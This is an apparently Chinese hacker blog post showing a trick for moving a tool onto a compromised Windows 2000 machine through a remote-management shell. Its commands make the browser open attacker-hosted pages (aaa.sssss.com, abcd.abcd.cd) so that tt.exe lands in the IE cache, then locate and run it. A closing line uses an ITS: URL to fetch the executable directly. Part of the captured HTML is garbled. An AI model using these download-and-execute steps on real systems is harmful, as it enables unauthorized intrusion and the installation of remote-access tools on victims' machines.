变态传文件法(比tftp ftp iget.vbe都爽的)

系统用户没有登陆情况下测试当然登陆了更好呵呵

-----------------可爱分割线---------------------------

"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org

[wsdd-wb7egq0ebt at C:\WINNT\system32]#dos

Microsoft Windows 2000 [Version 5 dot 00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

C:\WINNT\system32>dir c:\tt*.exe /s
dir c:\tt*.exe /s
 驱动器 C 中卷没有标签
 卷序列号是 045A-2E61
找不到文件

C:\WINNT\system32>start http://aaa.sssss.com/a.htm
start http://aaa.sssss.com/a.htm

C:\WINNT\system32>dir c:\tt*.exe /s
dir c:\tt*.exe /s
 驱动器 C 中卷没有标签
 卷序列号是 045A-2E61

 c:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\
Content.IE5\0VELAZCD 目录

2005-10-09  18:15               39,139 tt[1].exe
               1 个文件         39,139 字节

     列出所有文件:
               1 个文件         39,139 字节
               0 个目录  3,273,519,104 可用字节


C:\WINNT\system32>"c:\Documents and Settings\Default User\Local Settings\Temporary

Internet Files\Content.IE5\0VELAZCD\tt[1].exe"

"c:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\
Content.IE5\0VELAZCD\tt[1].exe"
MZ at
Opion :
    -filter                   ---Change TCP/IP filter to _disibledevent=>http://abcd.abcd.cd/tt.exe" rel=stylesheet type=text/css>

</head>

-----------------可爱分割线---------------------------

就是这些了如果你没看懂有什么用那只好说sorry了.呵呵

缺点?当然也是有呵呵

------------------------------------------------------------------

原来早就有人提过还有不需要构造htm思路方法

羞死

START ITS:HTTP://sdf.sdfd.net/tt.exe

 



  • 篇文章: 黑客种植木马新思路方法及防范策略

  • 篇文章: NTFS下做次幽灵(突破读写权限)
  • Tags: 

    延伸阅读

    最新评论

    发表评论